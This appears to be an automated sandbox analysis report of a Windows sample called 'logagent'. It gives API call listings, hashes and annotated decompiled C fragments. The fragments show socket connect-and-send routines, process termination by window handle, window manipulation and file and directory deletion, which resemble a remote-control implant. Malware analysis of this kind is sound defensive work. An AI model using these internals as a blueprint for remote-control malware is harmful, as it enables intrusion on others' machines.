                                  • API String ID: 901373779-0
                                  • Opcode ID: 334f91976ac30dc480e8cbec4ad1dca18011177d7e33d4e976a775bd4afbe7dd
                                  • Instruction ID: 7b2f1eb0bf348bc8e64f130e1c0075fbfd626f93203aeb1fcbfc33f5f8d0b54a
                                  • Opcode Fuzzy Hash: 334f91976ac30dc480e8cbec4ad1dca18011177d7e33d4e976a775bd4afbe7dd
                                  • Instruction Fuzzy Hash: 4C01F272A0020867C700BF6AEC4B9EF7B2DDF94755F00043ABD02AB1C2EBB5595C82D9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,00000000), ref: 0040DB4D
                                    • Part of subcall function 00402038: socket.WS2_32(00000000,00000001,00000006), ref: 00402053
                                    • Part of subcall function 0040209B: connect.WS2_32(0041BE70,0041BE74,00000010), ref: 004020B1
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(0041B290), ref: 0040DB87
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(0041B290), ref: 0040DB9B
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0000006B), ref: 0040E6AC
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040E6B5
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$V01@@$??0?$basic_string@??1?$basic_string@$??4?$basic_string@V01@connectsocket
                                  • String ID:
                                  • API String ID: 1130490860-0
                                  • Opcode ID: 187dd77ae07796d47033cb0c66226a999a2e014d3950e60fa145c5b80a05b893
                                  • Instruction ID: e4a4367fee434e29a8f43c0c5b5fd0ad89fe5f7d667a2954b88e43abb6528f81
                                  • Opcode Fuzzy Hash: 187dd77ae07796d47033cb0c66226a999a2e014d3950e60fa145c5b80a05b893
                                  • Instruction Fuzzy Hash: E301CC3260020C8BC300BBF5AC5A5EF3722DB85354B5084BBEA126B1D1CBBC0888869E
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 37%
                                  			E00405C62(void* __ecx) {
                                  				// Worker loop on a connection object (this = __ecx). Creates the event stored at
                                  				// this+0x34, then, while the byte flag at this+0x3d is set: if the std::string at
                                  				// this+0x14 differs from the constant at 0x415664, hands a copy to E004020C2 together
                                  				// with the global 0x41be70 (the same value that appears as first argument of the
                                  				// connect/recv calls in the listings on this page) and the constant 0x5a, then assigns
                                  				// 0x415664 back to the string, which makes that constant most likely the empty string.
                                  				// After each pass it blocks on the event. Always returns 1.
                                  				// Hex values in the trailing comments are the instruction addresses of each statement.
                                  				long _t7;
                                  				void* _t10;
                                  				void* _t18;
                                  				void* _t19;
                                  
                                  				_t18 = __ecx;                              // 0x00405c6a
                                  				_t7 = CreateEventA(0, 0, 0, 0);            // 0x00405c6d  auto-reset, non-signalled, unnamed
                                  				 *(_t18 + 0x34) = _t7;                     // 0x00405c77
                                  				if( *((char*)(_t18 + 0x3d)) != 0) {        // 0x00405c7a  keep-running flag
                                  					_t10 = _t18 + 0x14;                    // 0x00405c7c  pending std::string
                                  					do {                                   // 0x00405c84
                                  						// std::operator!=(const std::string&, const char*)
                                  						__imp__??9std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z(_t10, 0x415664); // 0x00405c86
                                  						if(_t7 != 0) {                     // 0x00405c90  operator!= returned true
                                  							_t19 = _t19 - 0x10;            // 0x00405c92  16-byte stack slot for a temporary std::string
                                  							__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z(); // 0x00405c98  copy constructor
                                  							E004020C2(0x41be70, 0x5a, _t10);   // 0x00405ca5
                                  							__imp__??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z(0x415664); // 0x00405cad  operator=(const char*)
                                  						}
                                  						_t7 = WaitForSingleObject( *(_t18 + 0x34), 0xffffffff); // 0x00405cb8  INFINITE
                                  					} while ( *((char*)(_t18 + 0x3d)) != 0); // 0x00405cbe
                                  				}
                                  				return 1;                                  // 0x00405cc9
                                  			}
                                  
                                  APIs
                                  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,004052B3), ref: 00405C6D
                                  • ??9std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(?,00415664), ref: 00405C86
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00405C98
                                    • Part of subcall function 004020C2: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,0041BE70,?,0040CF62,0000004B), ref: 004020D1
                                    • Part of subcall function 004020C2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004020E7
                                  • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00415664,0000005A), ref: 00405CAD
                                  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00405CB8
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: D@std@@U?$char_traits@V?$allocator@$D@2@@std@@$??0?$basic_string@V01@@$??1?$basic_string@??4?$basic_string@??9std@@CreateD@2@@0@EventObjectSingleV01@V?$basic_string@Wait
                                  • String ID:
                                  • API String ID: 2456067102-0
                                  • Opcode ID: 0d899be78884d94ce1c1d17b2caedbeea4029945f3674705747b8005b05b442e
                                  • Instruction ID: 941b29cc010242a65ed123258a0f7c68229dc58979b588812575d9674897e9d1
                                  • Opcode Fuzzy Hash: 0d899be78884d94ce1c1d17b2caedbeea4029945f3674705747b8005b05b442e
                                  • Instruction Fuzzy Hash: 3BF0C875500B00BFE71017249D88AE73BADEB81321B44993EF45296AD1CB755C448F74
                                  Uniqueness Score: -1.00%

                                  APIs
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?), ref: 00412996
                                  • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 004129A8
                                  • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(00000000), ref: 004129B4
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 004129D5
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004129DE
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$D@2@@std@@D@std@@U?$char_traits@$??0?$basic_string@$??1?$basic_string@?length@?$basic_string@A?$basic_string@D@1@@V01@@
                                  • String ID:
                                  • API String ID: 1435062097-0
                                  • Opcode ID: 3586215307afae4bda0d878f3d3768df6641f2eee590fdd5caa0a9f3ee196b0c
                                  • Instruction ID: ff140a25c5046e2b9097d957d6cdce37f73a2c16b69e3829c68fb2596ec2fa1c
                                  • Opcode Fuzzy Hash: 3586215307afae4bda0d878f3d3768df6641f2eee590fdd5caa0a9f3ee196b0c
                                  • Instruction Fuzzy Hash: 5101847650025EEFCB009F68DC889EE7BBCFF89310F008455EC5697291D7749645CB94
                                  Uniqueness Score: -1.00%

                                  APIs
                                  • OpenProcess.KERNEL32(00000410,00000000,00409B39,6DF7CB60), ref: 00412B5E
                                  • GetModuleFileNameExW.PSAPI(00000000,00000000,?,00000208), ref: 00412B7E
                                  • CloseHandle.KERNEL32(00000000), ref: 00412B89
                                  • CloseHandle.KERNEL32(00000000), ref: 00412B9A
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?), ref: 00412BAE
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CloseHandleV?$allocator@$??0?$basic_string@FileG@1@@G@2@@std@@G@std@@ModuleNameOpenProcessU?$char_traits@
                                  • String ID:
                                  • API String ID: 788797586-0
                                  • Opcode ID: 022d2fd6006c4be54da2a4328dbb8e4cfe22859691548aaa1e3c37b3e0e1552c
                                  • Instruction ID: ad3219438425194a21685df614a361962293db7adaf2229f34b8827cc35eabff
                                  • Opcode Fuzzy Hash: 022d2fd6006c4be54da2a4328dbb8e4cfe22859691548aaa1e3c37b3e0e1552c
                                  • Instruction Fuzzy Hash: 40F0A435644519FBDB119F50DD48FDA376CEB04701F008162F90ADA151DBB0FA418B99
                                  Uniqueness Score: -1.00%

                                  APIs
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 0040510A
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 00405117
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z.MSVCP60(?), ref: 00405124
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z.MSVCP60(?), ref: 00405131
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 0040513E
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$??0?$basic_string@U?$char_traits@$D@1@@D@2@@std@@D@std@@$G@1@@G@2@@std@@G@std@@
                                  • String ID:
                                  • API String ID: 1622488342-0
                                  • Opcode ID: c1a5856092b36e96a87c4607521c20b7092bbb6a4e7882b0079fe39a6a9934d7
                                  • Instruction ID: 6e933e02768027194ec3cb2a5611c35ee588213e6c767ddfd1f1ad46262d6be2
                                  • Opcode Fuzzy Hash: c1a5856092b36e96a87c4607521c20b7092bbb6a4e7882b0079fe39a6a9934d7
                                  • Instruction Fuzzy Hash: 37F01D71504A5EDFCB14CFE4D9489DABBFCAA58249300486D9593C3500E670F20DCB20
                                  Uniqueness Score: -1.00%

                                  APIs
                                  • socket.WS2_32(00000000,00000001,00000006), ref: 00402530
                                  • connect.WS2_32(00000000,0041B320,00000010), ref: 0040253F
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,0041B310,?,004040BC,00000056,?,?,?,?,?,?,?,?,?,?,0041B310), ref: 00402552
                                    • Part of subcall function 00402440: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(0041BE70,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 0040244A
                                    • Part of subcall function 00402440: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60([DataStart],00000013,?,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 00402463
                                    • Part of subcall function 00402440: ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(0000000B,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 0040246E
                                    • Part of subcall function 00402440: ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(0000000F,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 0040247B
                                    • Part of subcall function 00402440: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 0040248D
                                    • Part of subcall function 00402440: ?empty@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE_NXZ.MSVCP60(?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 00402498
                                    • Part of subcall function 00402440: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 004024A7
                                    • Part of subcall function 00402440: ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 004024B1
                                    • Part of subcall function 00402440: send.WS2_32(?,00000000), ref: 004024BB
                                    • Part of subcall function 00402440: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 00402512
                                    • Part of subcall function 00402440: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 0040251B
                                  • closesocket.WS2_32(00000000), ref: 0040256A
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000000,00000000,0041B320,00000010,00000000,00000001,00000006,0041B310,?,004040BC,00000056), ref: 00402575
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$D@2@@std@@D@std@@U?$char_traits@$??1?$basic_string@$??0?$basic_string@?length@?$basic_string@A?$basic_string@V01@@$?data@?$basic_string@?empty@?$basic_string@D@1@@V01@Y?$basic_string@closesocketconnectsendsocket
                                  • String ID:
                                  • API String ID: 3330461409-0
                                  • Opcode ID: bb6c5c5d8a8d8357e46d65d827089c0458299dd1d4395e672c94243f6853844e
                                  • Instruction ID: d3ca73ae3b273f0ad2b6a7631a0cd8f88755cf7fea3d905b6ba3b72b83ddc57b
                                  • Opcode Fuzzy Hash: bb6c5c5d8a8d8357e46d65d827089c0458299dd1d4395e672c94243f6853844e
                                  • Instruction Fuzzy Hash: F4F08231A4021876DB107AA6DC0EFDE7A088F517B4F004126FD25A61D2D6B94A9086DD
                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 58%
                                  			// Decompiler output (Joe Sandbox IDA plugin). _t25 stands for the frame pointer;
                                  			// the locals at _t25 - 0x10 and _t25 - 0x2c were not resolved by the decompiler.
                                  			E0040D817(void* __eflags) {
                                  				char* _t8;
                                  				void* _t25;
                                  
                                  				_t8 = E0040180C(_t25 - 0x10, __eflags, 0);          // build the argument string at _t25 - 0x10
                                  				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();   // -> its C string
                                  				GetWindowThreadProcessId(atoi(_t8), _t25 - 0x2c);    // decimal string treated as an HWND; owning PID stored at _t25 - 0x2c
                                  				E004126BC( *(_t25 - 0x2c));                          // OpenProcess + TerminateProcess on that PID (see subcall APIs below)
                                  				E0040EBBE();                                         // EnumWindows and rebuild of the window string (see subcall APIs below)
                                  				E004017DD(_t25 - 0x10);
                                  				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();   // string destructors
                                  				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                  				return 0;
                                  			}
                                  
                                  APIs
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?), ref: 0040D827
                                  • atoi.MSVCRT ref: 0040D82E
                                  • GetWindowThreadProcessId.USER32(00000000), ref: 0040D836
                                    • Part of subcall function 004126BC: OpenProcess.KERNEL32(00000001,00000000,?), ref: 004126C9
                                    • Part of subcall function 004126BC: TerminateProcess.KERNEL32(00000000,00000000), ref: 004126D7
                                    • Part of subcall function 004126BC: CloseHandle.KERNEL32(00000000), ref: 004126E3
                                    • Part of subcall function 0040EBBE: EnumWindows.USER32(0040EA96,00000000), ref: 0040EBD5
                                    • Part of subcall function 0040EBBE: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(0041BE60), ref: 0040EBE5
                                    • Part of subcall function 0040EBBE: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00415664,00000063), ref: 0040EC01
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0000006B), ref: 0040E6AC
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040E6B5
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$Process$??1?$basic_string@$??0?$basic_string@??4?$basic_string@?c_str@?$basic_string@CloseEnumHandleOpenTerminateThreadV01@V01@@WindowWindowsatoi
                                  • String ID:
                                  • API String ID: 2919580351-0
                                  • Opcode ID: 286111b59651673a2ab3b6f4f68ab843ff1871be7256de3f8cac4962603d56ee
                                  • Instruction ID: 7c517d206c8b3613f115d3eb8ec4858c415f79e5c2237a3465432eab5c7cfc94
                                  • Opcode Fuzzy Hash: 286111b59651673a2ab3b6f4f68ab843ff1871be7256de3f8cac4962603d56ee
                                  • Instruction Fuzzy Hash: 88F0F872900519DFCB04ABF1EC599EDB734EB9431AB10883AE112A20E1EA785555CB2C
                                  Uniqueness Score: -1.00%

                                  APIs
                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00412117
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?), ref: 0041212B
                                  • ?find_last_of@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIPBGI@Z.MSVCP60(00416C00,6DF55DF8), ref: 00412140
                                  • ?substr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,00000000), ref: 0041214F
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00412158
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$G@2@@std@@G@std@@U?$char_traits@$??0?$basic_string@??1?$basic_string@?find_last_of@?$basic_string@?substr@?$basic_string@FileG@1@@ModuleNameV12@
                                  • String ID:
                                  • API String ID: 758954411-0
                                  • Opcode ID: b21f42a26b2f103e63bea69b1fd2d22f01ac0b23dd7c23167616a2a11d239dfa
                                  • Instruction ID: 88ce2cb358dffa7750e3bac2ad7a8a5a8ee651c39e1957481fcccb9e80397935
                                  • Opcode Fuzzy Hash: b21f42a26b2f103e63bea69b1fd2d22f01ac0b23dd7c23167616a2a11d239dfa
                                  • Instruction Fuzzy Hash: 51F0B77554050FEFDB00DB90ED49FED7778EB54309F1080A1F506A61A0EAB0AA49CFA5
                                  Uniqueness Score: -1.00%

                                  APIs
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,00000000,00000005,?,?,?,?,?,00000000), ref: 0040E4B2
                                  • atoi.MSVCRT ref: 0040E4B9
                                  • ShowWindow.USER32(00000000,?,?,?,?,00000000), ref: 0040E4C1
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0000006B), ref: 0040E6AC
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040E6B5
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??1?$basic_string@$?c_str@?$basic_string@ShowWindowatoi
                                  • String ID:
                                  • API String ID: 4290155986-0
                                  • Opcode ID: 7a90a6c496572f5477e3ca14f1288a0fe9fbd8b3c6f5b3533141e0d3030503f8
                                  • Instruction ID: 20fcfc763774574552f6a97477b9112486ef0cdd22c9f36fb94fc0668df3d9e8
                                  • Opcode Fuzzy Hash: 7a90a6c496572f5477e3ca14f1288a0fe9fbd8b3c6f5b3533141e0d3030503f8
                                  • Instruction Fuzzy Hash: 05E0C932A10618CBDB04ABE1EC5DAEDB734FB94316F10883AE113A60E1EBB85555DA19
                                  Uniqueness Score: -1.00%

                                  APIs
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,00000000,00000005,?,?,?,?,?,00000000), ref: 0040E4B2
                                  • atoi.MSVCRT ref: 0040E4B9
                                  • ShowWindow.USER32(00000000,?,?,?,?,00000000), ref: 0040E4C1
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0000006B), ref: 0040E6AC
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040E6B5
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??1?$basic_string@$?c_str@?$basic_string@ShowWindowatoi
                                  • String ID:
                                  • API String ID: 4290155986-0
                                  • Opcode ID: e3ee81d1164a93c1fb4c98a060b1854a377feaec9e71c2190706ee9b8168fb8d
                                  • Instruction ID: f5d1e7a26b168e10bd759941827291fab992d242b1d9cf9e3ab824cccb0e0fd7
                                  • Opcode Fuzzy Hash: e3ee81d1164a93c1fb4c98a060b1854a377feaec9e71c2190706ee9b8168fb8d
                                  • Instruction Fuzzy Hash: 66E0ED31910518CBDB04EBE1EC5DAEDB734FB94316F10483AE113A60E1DB785556CA18
                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 25%
                                  			// Decompiler output (Joe Sandbox IDA plugin). __ecx is the object pointer ("this");
                                  			// the decompiler reuses _t5 for both the DeleteFileW result and the string comparison result.
                                  			E00406CFF(WCHAR* __eax, void* __ecx) {
                                  				WCHAR* _t5;
                                  				signed int _t8;
                                  				signed int _t9;
                                  				void* _t15;
                                  
                                  				_t15 = __ecx;
                                  				__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();   // wide path -> C string
                                  				_t5 = DeleteFileW(__eax);                                      // delete the file at that path
                                  				_t9 = _t8 & 0xffffff00 | _t5 != 0x00000000;                    // keep the success flag in the low byte of the return value
                                  				__imp__??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z(_t15 + 0x64, 0x415800);   // operator!=(this->string at +0x64, literal at 0x415800)
                                  				if(_t5 != 0) {                                                 // strings differ: also remove the directory
                                  					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
                                  					RemoveDirectoryW(_t5);
                                  				}
                                  				return _t9;
                                  			}
                                  
                                  APIs
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(0041B900,00000000,00406D78), ref: 00406D06
                                  • DeleteFileW.KERNEL32(00000000), ref: 00406D0D
                                  • ??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z.MSVCP60(0041B89C,00415800), ref: 00406D21
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 00406D2F
                                  • RemoveDirectoryW.KERNEL32(00000000), ref: 00406D36
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: G@std@@U?$char_traits@V?$allocator@$?c_str@?$basic_string@G@2@@std@@$??9std@@DeleteDirectoryFileG@2@@0@RemoveV?$basic_string@
                                  • String ID:
                                  • API String ID: 1823182134-0
                                  • Opcode ID: e1205a74ebe12c2f7724168040a5bb9e42afa766117467129f77aed8f79a1ea5
                                  • Instruction ID: 37aca360b5e6e25e1cbc72d235888c1a7b4a7ee3696255f0ca1c3cc056b1b9b3
                                  • Opcode Fuzzy Hash: e1205a74ebe12c2f7724168040a5bb9e42afa766117467129f77aed8f79a1ea5
                                  • Instruction Fuzzy Hash: EFE04F76541E25EBCA051BA0EC0C5CE3768AE85262394803AF802A3150CB6888458B68
                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 46%
                                  			// Decompiler output (Joe Sandbox IDA plugin). _t19 stands for the frame pointer;
                                  			// the local at _t19 - 0x10 was not resolved by the decompiler.
                                  			E0040D7E4(void* __eflags) {
                                  				char* _t5;
                                  				void* _t19;
                                  
                                  				_t5 = E0040180C(_t19 - 0x10, __eflags, 0);          // build the argument string at _t19 - 0x10
                                  				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();   // -> its C string
                                  				CloseWindow(atoi(_t5));                              // decimal string treated as an HWND; minimizes that window
                                  				E004017DD(_t19 - 0x10);
                                  				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();   // string destructors
                                  				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                  				return 0;
                                  			}
                                  
                                  APIs
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 0040D7F0
